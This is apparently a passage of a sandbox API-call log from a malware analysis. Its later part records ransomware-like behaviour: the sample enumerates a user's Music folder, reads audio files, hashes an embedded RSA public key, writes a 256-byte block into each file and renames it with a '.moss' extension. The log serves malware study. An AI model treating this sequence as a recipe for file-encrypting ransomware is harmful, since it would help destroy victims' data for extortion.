hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.536] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\") returned="D99YKJDL-0LajD\\" [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0171.536] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c8f8 [0171.536] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.537] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.537] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.537] PathFindFileNameW (pszPath="") returned="" [0171.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xc7aff4c0, ftLastAccessTime.dwHighDateTime=0x1d5e2f5, ftLastWriteTime.dwLowDateTime=0xc7aff4c0, ftLastWriteTime.dwHighDateTime=0x1d5e2f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.538] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\7q9Uuf7p.mp3") returned=".mp3" [0171.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\7q9Uuf7p.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\7q9uuf7p.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.539] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=47756) returned 1 [0171.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.542] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xba66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.542] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.543] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xba8c, lpOverlapped=0x0) returned 1 [0171.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.543] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.544] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.544] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.544] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.544] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.544] GetLastError () returned 0x0 [0171.545] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.545] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.545] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.545] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.545] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.545] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.545] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xba8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.545] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.546] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\7q9Uuf7p.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\7q9uuf7p.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\7q9Uuf7p.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\7q9uuf7p.mp3.moss")) returned 1 [0171.547] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\BVm 0I0y19-I.wav") returned=".wav" [0171.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\BVm 0I0y19-I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\bvm 0i0y19-i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.548] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=50738) returned 1 [0171.548] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.551] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc60c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.551] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.552] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc632, lpOverlapped=0x0) returned 1 [0171.552] lstrlenA (lpString="-----BEGIN PUBLIC 